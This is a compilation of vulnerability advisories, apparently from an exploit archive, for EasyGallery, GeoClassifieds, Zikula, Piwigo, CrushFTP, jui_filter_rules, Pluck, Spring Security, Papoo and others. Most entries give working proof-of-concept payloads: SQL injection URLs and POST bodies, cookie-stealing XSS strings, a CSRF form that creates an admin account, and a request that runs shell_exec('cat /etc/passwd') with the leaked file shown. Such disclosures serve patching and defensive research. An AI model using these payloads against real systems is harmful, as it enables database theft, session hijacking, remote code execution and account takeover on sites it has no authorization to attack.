source: https://www.securityfocus.com/bid/49458/info EasyGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0

source: https://www.securityfocus.com/bid/49475/info GeoClassifieds Lite is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. GeoClassifieds Lite 2.0.1, 2.0.3.1, 2.0.3.2 and 2.0.4 are vulnerable; other versions may also be affected. http://www.example.com/?a=19&c=id [SQL Attack] Cookie: language_id=1[SQL attack] Cookie: </div><script>alert('Xssed-By-Yassin');</script> http://www.example.com/index.php?a=19&c=</div><script>alert('Xssed By Yassin');</script> http://www.example.com/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

source: https://www.securityfocus.com/bid/49491/info Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Zikula Application Framework 1.3.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Ealert%28docu ment.cookie%29%3C/script%3E

source: https://www.securityfocus.com/bid/49508/info In-link is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. In-link 5.1.3 RC1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

source: https://www.securityfocus.com/bid/49502/info SkaDate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/member/blogs.php?tag=blog+[XSS]

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 PHP Code Execution in jui_filter_rules Parsing Library ====================================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution. Exploitation Technique ====================== Remote Severity Level ============== Critical CVSS Base Score =============== 6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P) CVE-ID ====== <unassigned> Impact ====== By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules. Status ====== Reported Vulnerable Code Section ======================= server_side/php/jui_filter_rules.php: [...] private function create_filter_value_sql($filter_type, $operator_type, ... [...] if(is_array($filter_value_conversion_server_side)) { $function_name = $filter_value_conversion_server_side['function_name']; $args = $filter_value_conversion_server_side['args']; $arg_len = count($args); for($i = 0; $i < $vlen; $i++) { // create arguments values for this filter value $conversion_args = array(); for($a = 0; $a < $arg_len; $a++) { if(array_key_exists('filter_value', $args[$a])) { array_push($conversion_args, $a_values[$i]); } if(array_key_exists('value', $args[$a])) { array_push($conversion_args, $args[$a]['value']); } } // execute user function and assign return value to filter value try { $a_values[$i] = call_user_func_array($function_name, $conversion_args); } catch(Exception $e) { $this->last_error = array( 'element_rule_id' => $element_rule_id, 'error_message' => $e->getMessage() ); break; } } } [...] The provided PHP parsing library allows to specify a PHP function to convert the supplied filter value on the server side. This leads ultimatively to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands). Proof of Concept ================ Using the demo application from the git repository: Executing shell_exec('cat /etc/passwd') Request: POST /ajax_create_sql.dist.php HTTP/1.0 host: http://www.example.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 471 a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d ate Response: HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 02:12:33 GMT Server: Apache/2.2.22 (Debian) Content-Length: 530 Content-Type: text/html {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/ bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"} Solution ======== This functionality should generally be removed or replaced by a mapping/ whitelist approach and strict type filtering to prevent arbitrary code execution. Affected Versions ================= >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1) Timeline ======== 2015-01-12: Vulnerability found 2015-01-13: Developer informed 2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1) References ========== [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3] https://www.ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt Advisory-ID =========== BC-1501 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. - -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds= =tnwW -----END PGP SIGNATURE-----

[CVE-2015-1517] Piwigo - SQL Injection in Version 2.7.3 ---------------------------------------------------------------- Product Information: Software: Piwigo Tested Version: 2.7.3, released on 9 January 2015 Vulnerability Type: SQL Injection (CWE-89) Download link: http://piwigo.org/basics/downloads Description: Piwigo is photo gallery software for the web, built by an active community of users and developers. Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and opensource (copied from http://piwigo.org/) ---------------------------------------------------------------- Vulnerability description: When an authenticated user is navigating to "Photos/Batch Manager" he is able to apply different filters. When all filters are activated and the button "Refresh photo set" is executed, the following POST request is sent to the server: POST /piwigo-2.7.3/piwigo/admin.php?page=batch_manager HTTP/1.1 Host: <IP> Content-Type: application/x-www-form-urlencoded Cookie: pwg_id=ri5ra17df1v20b0h51liekceu1; interface_language=s%3A2%3A%22en%22%3B filter_category_use=on&filter_level=1'&filter_level_include_lower=on&filter_dimension_min_width=600&filter_filesize_use=on&regenerateSuccess=0&filter_search_use=on&author=Type+the+author+name+here&filter_prefilter=caddie&title=Type+the+title+here&filter_dimension_min_ratio=1.25&level=4&tag_mode=OR&filter_prefilter_use=on&regenerateError=0&filter_filesize_min=0&filter_duplicates_date=on&remove_date_creation=on&date_creation=2015-02-06+00%3a00%3a00&submitFilter=Refresh+photo+set&filter_dimension_max_height=2300&filter_category_recursive=on&remove_title=on&filter_tags_use=on&filter_filesize_max=15.1&filter_dimension_max_width=3500&filter_dimension_max_ratio=1.78&selectAction=------------------&filter_dimension_use=on&remove_author=on&filter_duplicates_dimensions=on&start=0&filter_level_use=on&q=555-555-0199@example.com&confirm_deletion=on&filter_dimension_min_height=480 This POST request is prone to boolean-based blind, error-based and AND/OR time-based blind SQL injection in the parameter filter_level. When adding a single quote a database error message can be provoked. ---------------------------------------------------------------- Impact: Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability. ---------------------------------------------------------------- Solution: Update to the latest version, which is 2.7.4, see http://piwigo.org/basics/downloads. ---------------------------------------------------------------- Timeline: Vulnerability found: 6.2.2015 Vendor informed: 6.2.2015 Response by vendor: 7.2.2015 Fix by vendor 12.2.2015 Public Advisory: 18.2.2015 ----------------------------------------------------------------

======================================================== I. Overview ======================================================== Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows an attacker to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. ======================================================== II. Severity ======================================================== Rating: Medium Remote: Yes Authentication Require: Yes ======================================================== III. Vendor's Description of Application ======================================================== CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. 'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate the transfer of many types of files. Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. This keeps your server secure from unwanted abuse. User management includes inheritance, groups, and virtual file systems. If you want simple user management, it can be as easy as just making a folder with a specific name and nothing else. Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. http://www.crushftp.com/index.html ======================================================== IV. Vulnerability Details & Exploit ======================================================== 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) a) An attacker may add/delete/modify user's accounts b) May change all configuration settings Request Method: POST Location: /WebInterface/fuction/ Proof of Concept:- <html> <body> <form action="http://127.0.0.1:8080/WebInterface/function/" method="POST"> <input type="hidden" name="command" value="setUserItem" /> <input type="hidden" name="data&&95;action" value="new" /> <input type="hidden" name="serverGroup" value="MainUsers" /> <input type="hidden" name="username" value="Hacker" /> <input type="hidden" name="user" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><user&&32;type&&61;"properties"><username>Hacker<&&47;username><password>123456<&&47;password><max&&95;logins>0<&&47;max&&95;logins><root&&95;dir>&&47;<&&47;root&&95;dir><&&47;user>" /> <input type="hidden" name="xmlItem" value="user" /> <input type="hidden" name="vfs&&95;items" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><vfs&&32;type&&61;"properties"><&&47;vfs>" /> <input type="hidden" name="permissions" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><permissions&&32;type&&61;"properties"><item&&32;name&&61;"&&47;">&&40;read&&41;&&40;write&&41;&&40;view&&41;&&40;resume&&41;<&&47;item><&&47;permissions>" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2) Multiple Cross-Site Scripting (Web Interface - Default Config) Type: Reflected Request Method: POST Location: /WebInterface/function/ Parameter: vfs_items Values: <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> vfs_items = <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> Proof of Concept: POST /WebInterface/function/ HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html Content-Length: 656 Cookie: XXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0<a%20xmlns:a%3d'http://www.w3.org/1999/xhtml'><a:body%20onload%3d'alert(1)'/></a>%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E Type: Reflected Request Method: GET Location: /WebInterface/function/ Parameter: path Values: <script>alert(1)<%2fscript> path=%<script>alert(1)<%2fscript> GET /WebInterface/function/?command=getXMLListing&format=JSONOBJ&path=%<script>alert(1)<%2fscript>&random=0.3300707341372783 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/ Cookie: XXXXXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ======================================================== VI. Affected Systems ======================================================== Software: Crushftp (Web Interface) Version: 7.2.0 Build : 147 < 7.3 Configuration: Default ======================================================== VII. Vendor Response/Solution ======================================================== Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Solution : upgrade to 7.3 or change <csrf>true</csrf> in prefs.xml ======================================================== VIII. Credits ======================================================== Discovered by Rehan Ahmed knight_rehan@hotmail.com

Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <= v. 2.7.3 Advisory ID: SROEADV-2015-06 Author: Steffen Rösemann Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015) Vendor URL: http://piwigo.org Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its administrative backend. ================== Technical Details: ================== The reflecting XSS vulnerability resides in the "page" parameter used in the file admin.php which can be found in the administrative backend located here in a common Piwigo installation: http://{TARGET}/admin.php?page=plugin-AdminTools Exploit-Example: http:// {TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E The SQL injection vulnerability can as well be found in the administrative backend and can be found in the "History" functionality located here: http://{TARGET}/admin.php?page=history The SQL injection vulnerability can be exploited by appending arbitrary SQL statements in a POST request to the parameter "user": Exploit-Example: POST /piwigo/admin.php?page=history HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/piwigo/admin.php?page=history&search_id=82 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit ========= Solution: ========= Install the latest version 2.7.4 (released 17th February 2015). ==================== Disclosure Timeline: ==================== 08-Jan-2015 – found the vulnerability 09-Jan-2015 - informed the developers 09-Jan-2015 – release date of this security advisory [without technical details] 09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4) 17-Feb-2015 - vendor releases patch 2.7.4 (see [3]) 17-Feb-2015 - release date of this security advisory 17-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://piwigo.org [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html [3] http://piwigo.org/forum/viewtopic.php?id=25179

source: https://www.securityfocus.com/bid/49525/info Pluck is prone to multiple file-include and a file-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks. An attacker can exploit local file-disclosure vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. Pluck 4.7 is vulnerable; other versions may also be affected. 1-File Inclusion: include(ALBUMS_DIR.&#039;/&#039;.$_GET[&#039;album&#039;].&#039;.php&#039;); Require: if (file_exists(ALBUMS_DIR.&#039;/&#039;.$_GET[&#039;album&#039;].&#039;.php&#039;)) { function albums_pages_site() { 2-File Inclusion include (ALBUMS_DIR.&#039;/&#039;.$album[&#039;seoname&#039;].&#039;.php&#039;); foreach ($albums as $album) { $albums = albums_get_albums(); 3-File Disclosure echo readfile(&#039;../../settings/modules/albums/&#039;.$image); $image = $_GET[&#039;image&#039;]; requires: if (file_exists(&#039;../../settings/modules/albums/&#039;.$image)) {

source: https://www.securityfocus.com/bid/49521/info Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36128.pcap

source: https://www.securityfocus.com/bid/49535/info Spring Security is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input. By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling. The following versions are vulnerable: Spring Security 2.0.0 through 2.0.6 Spring Security 3.0.0 through 3.0.5 http://www.example.com//mywebapp/logout/spring-security-redirect=%0d%0a%20NewHeader%3ainjectedValue

source: https://www.securityfocus.com/bid/49587/info Papoo CMS Light is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Papoo CMS Light 4.0 is vulnerable; other versions may also be affected. http://www.example.com/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script> http://www.example.com/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>